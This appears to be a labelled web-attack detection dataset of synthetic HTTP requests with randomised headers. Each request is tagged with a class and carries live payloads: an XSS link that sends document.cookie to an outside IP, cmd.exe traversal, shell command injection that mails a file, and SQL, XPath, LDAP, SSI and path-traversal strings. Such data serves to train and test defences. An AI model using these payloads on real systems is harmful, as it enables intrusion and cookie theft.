Range: -183629,81875-7
Referer: /lRdih/u5deeydm/twi0qtm.msf
TE: gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.8 (X11; U; Solaris 7.5; rn-rT; rv:2.4.8) Gecko/01686976
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: HTTP/7.4 www.ungit.jpg, 4.7 www.nyodtl.jpg, 6.2 5.187.23.67
Transfer-Encoding: deflate
Upgrade: eEtha/8.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 51653386435804651
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42340
Start - Id: 48024
class: XSS
GET /2fnstyle0p25Q/aP1UiLm/nrcpTrpyd31i4nD/rldosaptegnhuebh/rsauargo8zaa/rfqG6SCmiEv/ffav@hlyuKT5nHfW.jpg?ireuota2Hjiie=%3Ca++href+++%3D++%22++++javas%26%2399%3Bript%26%2335%3B%5Bwindow.open%28%27http%3A%2F%2F88.227.37.123%2Fle.cgi%27%2Bdocument.cookie%29%3B%5D++%22++++%3E HTTP/1.0
Host: 117.164.166.68
Connection: wiHpo
Accept: application/postscript;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: h-hd1t;q=0.2, uh-eTnd
Cache-Control: only-if-cached
Client-ip: 8.30.164.22
Cookie: jaft8CexrLibt=2770492
Cookie2: $Version="114"
Date: Tue, 25 Sep 07 23:28:08 UTC
ETag: "GJ8gcU4@LIDaCNFpkX9Z"
Expect: 0er3ncru
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 20 Dec 08 19:13:05 CET
If-Unmodified-Since: Sun, 04 Apr 04 19:12:10 GMT
If-Match: "ObLaTPHaQn.IRrY"
If-None-Match: *
If-Range: Mon, 12 Apr 10 20:43:26 CET
Max-Forwards: 044
MIME-Version: 4.1
Pragma: c7h=meev
Proxy-Authorization: uedrde k86eh=jiih
Authorization: NTLM bG9lZWRlTDJlaHJ0bm1hclRTbnRtaWdzb3Z0SWl5V2VtNXQ=
Range: 3837-2
Referer: /doeEymyn/9hpt7/2wopSn/slanee0e/oghl.png
TE: chunked;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/6.8 (compatible; MSIE 6.6; Win98; Perts299at)
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: HTTP/3.5 www.czeacsu0.css, 4.9 www.hc6ot.js:9007
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48024
Start - Id: 43769
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.1
Host: www.ynsdschaFe.gov
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: iso-8859-2;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: ao='p8'
Client-ip: 111.17.94.212
Cookie: ad4f=yb;cfp=\m;qNBxaC@VH=2
Cookie2: $Version="937"
Date: Sun, 29 Apr 07 24:28:29 UTC
ETag: W/"v8oIFfpbb9jaiyr"
Expect: 100-continue
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Thu, 10 Jun 04 19:07:31 GMT
If-Unmodified-Since: Tue, 25 Oct 05 05:57:49 CET
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "EGU7l-Ye4iMV_T0X-"
If-Range: Fri, 13 Mar 09 02:50:55 UTC
Max-Forwards: 34
MIME-Version: 7.5
Pragma: reet=aek
Proxy-Authorization: Digest opaque="leSssie"
Authorization: uere agvIeAy=elieh2e
Range: 10571-03
Referer: /lendlh/rbaQ.sh
TE: deflate;q=0.1,trailers,deflate
Trailer: From
User-Agent: r1asrS/9.1.0.8
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 9.1 www.edbtsoN.jpg
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43769
Start - Id: 44505
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.1
Host: www.Ceh2ma.be
Connection: keep-alive
Accept: video/quicktime;q=0.6, audio/*;q=0.7, application/postscript
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, gzip;q=0.4
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 245.96.181.37
Cookie: laNufng=k;9gusrrj-.=eoqesnxary9f;utg=79;wfa4beV7B=rnio?olania
Cookie2: $Version="123"
Date: Sun, 01 Feb 09 02:04:14 UTC
ETag: W/"BM7GJYNnC3qxjsK"
Expect: auaEbj2f=ti3z24oz
From: ciaeri@estekqcd.uk
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Mon, 24 Sep 07 11:20:46 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Apr 10 01:48:13 UTC
Max-Forwards: 75
MIME-Version: 8.2
Pragma: wd=vaec
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 02051-7,-37253,903-654
Referer: /auYmnqoe/murmy/6onts3/5nbegoy.sh
TE: gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 0.0; ct-ey; rv:7.7.2) Gecko/76887489
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 455x841
Via: usi/5.0 44.195.109.125
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44505
Start - Id: 35437
class: SqlInjection
GET /x7steehiodaIdn/f3xo3_OX-dZyyfASrH/WpJ/rQBfP/kgSO2o1JStOrIowVGs/rzrFeiurthot/n_c8hC/eIoNntqt1heoyetaefeT/ax8J8XGQCHVk0juu/aqJkI/bZRkMZ6dQ612uR/oQqKcHi5u89PilgeN.aspx?easatos7=145&gaia=-&ame9dthera=oindb6e&mkv8onzgrxid=%27UNIONALLSELECTfieldFROMtindstllneolWHERE%27%27%3D++++%27&se=841&2tfdammJ0bolE=48143&az6=yTr9girau7 HTTP/1.0
Host: 123.208.56.208
Connection: wm8h9to
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.5, compress
Accept-Language: Al-eywi;q=0.5, oia-ssR, tepodttn-strseha, moeQ-sehs4oE;q=0.2
Client-ip: 99.67.58.74
Expect: axrytcd=m9guio;mhhrit
If-Modified-Since: Thu, 11 Dec 08 01:47:54 UTC
If-Match: "nPsztvwa1VS9WM5etvdp"
Authorization: Digest algorithm=UfPJoj
Referer: http://www.orwe7.uk/ohnh5D/lacilTao/ttwri.txt
User-Agent: 7c2enad
Via: 8.4 121.196.245.213

null

End - Id: 35437
Start - Id: 43135
class: OsCommanding
GET /stq7jWH@IkE@sk/loYehsssahFly/i28MugDpMC-lJ4q.8GbF/8bwqpD3Fva3H5t6bya/peepiSek/i7tnsedoxbwopl0eto/Newp--@Y9L9v@svc/oel.htm?mr8hhehpwlie=re%40&leennoraafcxhtt=t3gtRfmdn9fnrchtin&huedDelEc=%5Deco%5D%24tRt%3Fnf&adax60=Cn&wmYosysdEnye=mail+++++etsr8p1%40ezysn.pqntGsf.gov+%3C%3C++++%2Ftmp%2Fwu.c+++++%3B HTTP/1.0
Host: www.4rty.org
Connection: keep-alive
Accept: audio/x-wav, application/*;q=0.2
Accept-Charset: utf-7, iso-8859-3;q=0.4
Accept-Encoding: deflate, identity, identity;q=0.1, identity;q=0.7
Accept-Language: *;q=0.7
Cache-Control: min-fresh=27
Client-ip: 143.187.208.131
Cookie: n1eecayara=21447
Cookie2: $Version="7"
Date: Thu, 09 Jun 05 22:53:02 GMT
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Sun, 02 Jul 06 20:28:17 GMT
If-Unmodified-Since: Sat, 28 Nov 09 17:49:55 GMT
If-Match: *
If-None-Match: "vaINLNI6XLLSjCes"
If-Range: Sat, 25 Oct 08 16:51:39 UTC
Max-Forwards: 872
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: rates2 ipii1rie=esrrf
Range: 06-14835,74438-28398,3461-5
Referer: http://gtehds.st/siscmtld.gif
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: If-Match
User-Agent: Mozilla/3.9 (Windows; U; WinNT 1.2; tE-Is; rv:0.0.3) Gecko/87210312
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 7.1 www.tieon.shtml, 8.2 208.220.15.166
Transfer-Encoding: pjyc
Upgrade: arlate/4.9, dxn6g/2.1, pi4tlo/0.5, cgu/2.4
Warning: 268 9.126.100.201 "nymbntn" "Thu, 16 Aug 07 04:22:38 GMT"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 231798615796568
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43135
Start - Id: 41804
class: SqlInjection
GET /n6kTVk/o1p.jsp?osecvaaSlel=oiOsn6Uumz4et&eel2=i%2Byin&t2pemhtrh=dd&ls5erftdrne=h8GoJJ&sLMo0zlai=childekiLe&5vtgyyeenuK3a=%24wp-uN&oqcl=edZZotWDF%40&oECkp=269476&cd0vtltin5nz=ora&jru6Y_servicesocE=iltlyu0is8crrwgmu&3ofaoo=%3B+++++EXEC%28++%27INS%27%2B%27ERT++INTO+users+++++values%288%2C%27i6iaaC%27%2C%27srn%27%29%29 HTTP/1.1
Host: 90.248.68.182:11418
Connection: close
Accept: */*;q=0.8
Accept-Charset: windows-1254;q=0.7, big5, euc-tw, x-mac-arabic
Accept-Encoding: *;q=0.4
Accept-Language: eowoNte-2aj;q=0.0
Cache-Control: max-age=1
Client-ip: 175.74.180.28
Cookie: ttdZlg=g82p4NkT;zlo21rd=lsg
Cookie2: $Version="6"
Date: Wed, 29 Jul 09 03:18:20 CET
ETag: W/"B9vez_6N2C2hWas2l"
Expect: tia3Rge
From: ame9p@neehptrbo.fr
If-Modified-Since: Wed, 10 Jan 07 11:04:30 GMT
If-Unmodified-Since: Thu, 19 Nov 09 01:50:50 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Dec 08 04:24:38 CET
Max-Forwards: 017
MIME-Version: 4.3
Pragma: nner0e=nccidys
Proxy-Authorization: dgDa4v rdekp=aenneN
Authorization: Digest response="AfBa693E738c5312C3cc598A5b18d363"
Range: 340098-821
Referer: http://ezioyEse.biz/tconje.asmx
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: dMmoEs (dWZ.@p0y; htxRxj2e; evWBJdfvvn)
UA-CPU: x86
UA-Disp: 885,1136,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7848x368
Via: 4.7 0.69.197.174, 6.1 www.nmnt.jpeg
Transfer-Encoding: compress
Upgrade: eet/8.2, womym/1.9, Orius/4.0, orvtl/1.7, sae7/5.2
Warning: 706 www.bha5ea.gif "rttdDznEnnn" 
X-Forwarded-For: 234.161.201.75
X-Serial-Number: 34361564811
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41804
Start - Id: 39304
class: SSI
GET /ro8onsaplBsau/hohqcet0riyaqtiiasyr.htm?na8ecus=9138452&7rnqely0ehjarie=53102&HH=26206&wnlhOEgngae250=siraO&tat5X=fhmcefea%28yiwi41&@7KvxBDoQ=Ad&ecvkhlc=a&L_ZeBJQv=%3C%21--%23email+fromhost%3D%22www.Ehdenre.com%22+tohost%3D%22mailbox.od5.com%22+message%3D%22nSzyiw+tm0rcpr+ki+tbvt%22+fromaddress%3D%224tmedw.com%22+toaddress%3D%22itbsR.eesao.com%22+subject%3D%22oew%22+sender%3D%22w6h.com%22+replyto%3D%22iahsuth.com%22+cc%3D%22eSE%22+inreplyto%3D%22Turss+sNns+dhcout%22+id%3D%22eadirmail%22+--%3E HTTP/1.1
Host: 239.248.189.149
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-7;q=0.9, x-mac-japanese;q=0.9, gb2312, euc-tw, windows-1257
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 138.46.179.184
Cookie: aEeo2Elermw=3538;obka4=iBmjYaaHluA8;fbgsoundMK_KU5V0Z=jceteoopasswd0Isen;nmtlnccAaeiA=wc6UtI;ssc9hcegud4HNae=3z aylfewget seEt~ v';e9qr1sd=o@io>hbb
Cookie2: $Version="461"
Date: Wed, 30 Jul 08 15:47:07 UTC
ETag: W/"t6VPSZigbyYadImOF6e"
Expect: ivretIHm=oecetoss;otnpul=u4O88p
From: Tsaa@kodl.uk
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Tue, 23 Jun 09 10:13:20 GMT
If-Match: *
If-None-Match: *
If-Range: "7DYUllIPglxX0x09"
Max-Forwards: 4
MIME-Version: 8.9
Pragma: trstii8=ftpothnq
Proxy-Authorization: Basic bDN0bGhzOmVldEdkZXI=
Authorization: NTLM a25pdG82dG13dWlmbGREOGhpYjd0MWFhZERvcnRta2Ftb29ubmh4
Range: 9225-57239,301-8
Referer: /aahfn/idiao/auRe.asmx
TE: trailers,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: evgyvuaseI8pp2s
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5234x268
Via: unmc/1.0 59.169.11.105, 4.0 235.210.94.78
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 228 www.sonottir.jpg "rhCetiasi8AntEe7B" "Tue, 08 May 07 07:56:15 GMT"
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 559061405127813998
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39304
Start - Id: 48844
class: XPathInjection
GET /1tiateiutuhaThO/bgNu@cRstyle/ePRQD0/iaaatssi.pl?ge=227678685&nt3hnep=6es&B8nU=05datocNzTer&neErro47a=78281&PKAHPYAcatufX=ev&pRnb5lT=dS79iCG&dgu8cur7u2tli=CvnsT0e%3D&imchns6b=cimnhmer%27+++++or+1%3C+e%2Fnehs7k%2Fmlury%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D1%5D++++or+%27lmwb%27++++%3D+%27&rntsehi89n6et=w&iMirI5ehagle7l4=004&-tFi0a=aecnm&Finclude9connectHnc=9dnas HTTP/1.0
Host: 32.236.237.221
Connection: J5c25n
Accept: */*;q=0.7
Accept-Charset: iso-8859-9;q=0.9, iso-8859-7;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: te5xeC='evsxe'
Client-ip: 45.241.92.24
Cookie: ds=154691665;argtekrereru4=lpassthru=r2soesooe
Cookie2: $Version="71"
Date: Fri, 05 May 06 20:29:07 UTC
ETag: W/"8E1nvDiVlYEiyT9TELZx"
Expect: iutdtan
From: w2h3rar@tkko9pi.org
If-Modified-Since: Tue, 16 Feb 10 21:17:02 UTC
If-Unmodified-Since: Sun, 15 Mar 09 04:57:12 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 07 Dec 08 12:10:35 GMT
Max-Forwards: 984
MIME-Version: 6.2
Pragma: yt28lanr='yeugo'
Proxy-Authorization: Digest nc=412BEE2D
Authorization: iuut ieiRnfr=Svncz
Range: 5-03627
Referer: /248hiitw/oesVtb/isloz.pl
TE: gzip;q=0.8
Trailer: Accept-Charset
User-Agent: Mozilla/4.8 (compatible; cdnr2myotr; Win 9x; a8rmD0atu; ny7thn)
UA-CPU: StrongARM
UA-Disp: 780,9634,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 412x876
Via: HTTP/7.0 www.1elw.gif
Transfer-Encoding: deflate
Upgrade: qdiue/5.0
Warning: 266 252.104.26.149 "9bdidtHc" "Thu, 01 Nov 07 22:00:30 GMT"
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48844
Start - Id: 45447
class: PathTransversal
GET /hz4rO_/me0visoeotc/pI.Xx2C3TD/e8.9H8@TESOEsN/rpeiT/0i/rzOElkQWt2CJB5CIo/isestetcesrlRiga/GUZvSXbZPtmpZ9_UJ/eQ.o.cfm?9desenNoaiir=oohoi&rerye=rxo&titqhi=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&ih6ertgtmg3t=ealar&82ndHx1tra=69&heIdndi6eeGhy=rPu3MKDjIYnC&Oz8OsMaZ=ywsn HTTP/1.1
Host: www.anatirhnbJ.st:0737
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: lteczar-teroh;q=0.4, scteIe-s9gmds;q=0.6, Sew-sTit;q=0.8
Cache-Control: no-store
Cookie: execWbF5W=4;e7meet=002503618;D5sK9=An0i;eu=i3HmQmU0Fstt;yie=xh ;cogtesthMalen=0820716
Cookie2: $Version="1"
Date: Tue, 03 Aug 04 20:14:03 GMT
If-Modified-Since: Wed, 05 May 04 06:30:41 GMT
If-Unmodified-Since: Fri, 01 Jul 05 09:48:00 CET
If-Match: *
If-None-Match: "8_ctXRlnCKINx16eiKrq"
If-Range: Mon, 05 Sep 05 04:03:44 UTC
Max-Forwards: 0
Pragma: sunhahaa=bie
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: ol8si b5aft=hhohnl
Range: -8
Referer: /adnhsnn/skieelo/ante4eaa.pl
TE: trailers,deflate;q=0.4,chunked
User-Agent: xljCUle http://www.bqeehn.gov
UA-Disp: 5353,5285,32
UA-OS: FreeBSD
Via: 6.5 www.oaZ6aa.shtml:467, 5.1 www.hsoHnt.jpg, 9.2 232.228.101.60
Upgrade: ldu4yj/2.7, bmeN/8.1, deh/2.9
X-Forwarded-For: 176.191.17.103
----: -----------

null

End - Id: 45447
Start - Id: 49313
class: XPathInjection
GET /jsD85l9WR./niXtKnlkQCNo/asa3D/oBMihXq/gnas/t7.Nj2fNmSD/iq2L/5QnQxsBFtqqsuQC9dP/cq0K2UQeHa/Ze0aEI/7Pq.htm?o8thoeeoalwoe8=wEq&BeEdSorjWe=982++++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++647%3D&neono=eIaRJR&stt1aEL3a=ti24childiframefhTcLyCq&nDn1=0613458&thttLemebaz=711 HTTP/1.0
Host: 159.172.61.142
Connection: close
Accept: application/*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, gzip, compress, identity, deflate;q=0.7
Accept-Language: Emtlos-zxiasihw, Myty8ai-ytI, 5alns4n-yinghz, ee8-lx;q=0.4
Cache-Control: min-fresh=2383
Client-ip: 19.197.54.208
Cookie: 9xteIw=846177751;ieafesz8ye=u3uhome7%iHtodocumentL[oj3ms;acezehu=ciAgw@
Cookie2: $Version="01"
Date: Tue, 04 Jul 06 05:16:04 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Wed, 22 Jun 05 21:26:43 CET
If-Unmodified-Since: Fri, 03 Sep 04 17:15:53 UTC
If-Match: *
If-None-Match: "aWCWnw0.uGysj-Pu"
If-Range: Fri, 18 Nov 05 04:26:47 CET
Max-Forwards: 504
MIME-Version: 7.2
Pragma: lwr='lh'
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: Basic ZDd2bXlmOnRydmVsZWg=
Range: 28823-,87212-
Referer: http://www.nc2rl.com/0eu7swa/7cLk.jpg
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.0 (Machintosh; U; Mac OS X 7.0; ar-c8; rv:6.6.9) Gecko/63303745
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 016x6303
Via: dni/4.9 184.216.170.59, FTP/3.4 www.eath.jpg
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 136 17.202.73.10 "eT7sades18nsottsReiG" "Sun, 12 Dec 04 10:18:26 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 8829334144305
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49313
Start - Id: 38892
class: LdapInjection
GET /TUEBuM_E_/niy/gP9-G4/tyj71fGOchsEsQ8/qnVSw/54T.jsp?2diOOxts0le=odyecizatlike1+qTb&WtaeREcw0za7=u%28tIs&ntzhspsmddtxy=54070435&odremeqljunelTe=%40699netcatforma%2Baccess_loga%3B%2Beuf&rouuefts=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.pxttb4.biz
Connection: 9sPniaak
Accept: audio/x-wav;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 191.208.34.138
Cookie: uit=83820786;Rdeoewaf=nAuime
Cookie2: $Version="1"
Date: Wed, 25 Oct 06 08:13:07 UTC
ETag: W/"JA.n_Oavbu1qBnugS3f"
Expect: isoZd9h5=s7ntbi0r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sat, 02 Aug 08 20:43:46 GMT
If-Unmodified-Since: Sat, 09 Oct 04 11:06:22 GMT
If-Match: *
If-None-Match: "ryVf8n9p4suiwzd5G"
If-Range: Sat, 19 Apr 08 11:56:07 GMT
Max-Forwards: 2441
MIME-Version: 0.3
Pragma: yicbeptm='wt'
Proxy-Authorization: Digest username="woEv"
Authorization: NTLM aHA0VEh0RWkzTzZkcGhkc2VldHd5aWhlbmFlbW5lZWh0aXRlOHRpdG91b2J0bg==
Range: 15934-,799-8058,-81465
Referer: http://www.Ycq0.gov/hdlosh2i/eyvTld/Orsrget/E9ssQtn.conf
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: t5ona42
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 3.7 212.12.149.213, bnne/4.9 www.rrth.shtml, 0.9 www.yItriu.js
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: v4ALI/5.0, wpsz/7.3
Warning: 822 www.hOrItr7c.jpg:50734 "1jmea2e2uepaea" "Mon, 20 Jun 05 14:05:30 GMT"
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38892
Start - Id: 42804
class: OsCommanding
GET /mj@7/p@@zrhtaccesrRzZi/69RJgwinnttWUmX.pl?reabaa6=0nw0otngg4iHi2li&n4ps5izcz=yRFqxZ&ZPZy9=teot HTTP/1.0
Host: 116.166.205.193
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese;q=0.4
Accept-Encoding: 87.153.204.133    |   dir
Accept-Language: aZaeg-hmey
Cache-Control: no-store
Cookie2: $Version="466"
Date: Sun, 01 Mar 09 08:58:11 UTC
If-Unmodified-Since: Mon, 12 May 08 08:44:00 GMT
If-Range: Tue, 20 Feb 07 03:50:16 UTC
Pragma: tafio='nswason'
Referer: /alsl.bin
TE: deflate;q=0.5,chunked;q=0.7,trailers
User-Agent: Mozilla/5.2 (Machintosh; U; Mac OS X 4.3; br-eL; rv:6.1.4) Gecko/96342920

null

End - Id: 42804
Start - Id: 37845
class: LdapInjection
GET /53eXcZnu1QvuoY.pl?ajUsm.Bsystempasswd=%29++++%28++%7C%28displayName%3Dhad*%29+++%28name+%3D++had*+++%29%28+mail%3Dhad*+%29&imepe2nboan=2489525&bit7ruyh2=vema&Ytirtej4u=24227&8wCsu2i4uC=thnneoeotfsnfloxe&isemmr5OOaamt=11&cTvcrEgot5d=eai&reytxet=684562004&gho3rhgettulh=d8qN.i&1omenti=utcwDeaz&7EnzfrtnlIn=5732&anmo33hdr=S+wAeiedi%40b+dR%3D&tras8rhrPsb=942527&tuyxPsteiIr4bt=436&Pimgycp-u=eNw0az HTTP/1.0
Host: www.freshHioct.st
Connection: eEtw
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: hgng=wl
Client-ip: 2.231.54.23
Cookie: 0c.0ilsocdM.e=servicesn;Tosl=742182;t6s4Mk8rrEme=eotKsroSZo
Cookie2: $Version="033"
Date: Sun, 17 Jun 07 02:57:47 CET
ETag: "v.u7W79d5gfnlTy"
Expect: dNnesabo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sun, 14 Mar 04 06:29:18 UTC
If-Unmodified-Since: Fri, 09 Mar 07 23:25:53 CET
If-Match: *
If-None-Match: "Q.qUhF_Qgyjhz8Oom"
If-Range: Wed, 25 Feb 04 19:42:24 CET
Max-Forwards: 5
MIME-Version: 0.1
Pragma: fe=sJMl
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: hsedo sch1rnta=hqovoe
Range: 853418-,-430
Referer: http://www.2Py8eat.com/eif0mar/ecMbodPd/oapge/ot4ndav.png
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/6.8 (Windows; U; Win98 9.2; ed-7r; rv:7.9.8) Gecko/11575994
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: aAgh/4.6 154.170.231.53
Transfer-Encoding: deflate
Upgrade: uoE/5.1, iitjl/6.0
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37845
Start - Id: 41383
class: SqlInjection
PUT /aTnq0soqstsmie88th9/Qw9WPZlIK/z6a6bZw0ubVYDKQP/4ortcnorme8sddsnT/5pm.dll? HTTP/1.0
Content-Length: 319
Content-Language: ohl,rteoy
Content-Encoding: deflate
Content-Location: /iookrc/esm4eiro/as3t7fps/pltlos/alu2ehhd.jpeg
Content-MD5: dzdvU2Ftc2plb3ZlZWRuNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Sep 05 03:06:06 CET
Last-Modified: Thu, 15 Mar 07 04:03:16 GMT
Host: www.lsezoni1oT.de:63
Connection: 0sor1rdw
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.7, euc-cn, iso-8859-3;q=0.4
Accept-Encoding: deflate;q=0.3
Accept-Language: lRn-hadl;q=0.2
Cache-Control: waT4b='zl'
Client-ip: 93.72.204.142
Cookie: ngtD=2YhR8R;esEeish=3c82I4.IL2iT;seaYhrMpzlna5r=3
Cookie2: $Version="30"
Date: Sun, 24 Feb 08 20:56:20 UTC
ETag: "8SIu.AFvTvU3KcHdVRD"
Expect: Nerh01=hehmt9
From: nfie@aaskkmo.com
If-Modified-Since: Thu, 11 Jun 09 07:57:07 UTC
If-Unmodified-Since: Mon, 23 Jun 08 10:55:20 GMT
If-Match: "I7Wz--cPV01sT3@B"
If-None-Match: *
If-Range: *
Max-Forwards: 03
MIME-Version: 2.2
Pragma: osd='1k75ipmn'
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest algorithm=ahIeaoa
Range: -49879
Referer: http://www.leir.uk/ehain/aOcnzi/mt9eh.bin
TE: chunked;q=0.2
Trailer: Accept-Language
User-Agent: m0ea0Er/8.9
UA-CPU: 68000
UA-Disp: 727,089,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1178x5140
Via: rhlswi/0.0 179.26.152.175
Transfer-Encoding: deflate
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Forwarded-For: 85.56.154.10
X-Serial-Number: 3067055271
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

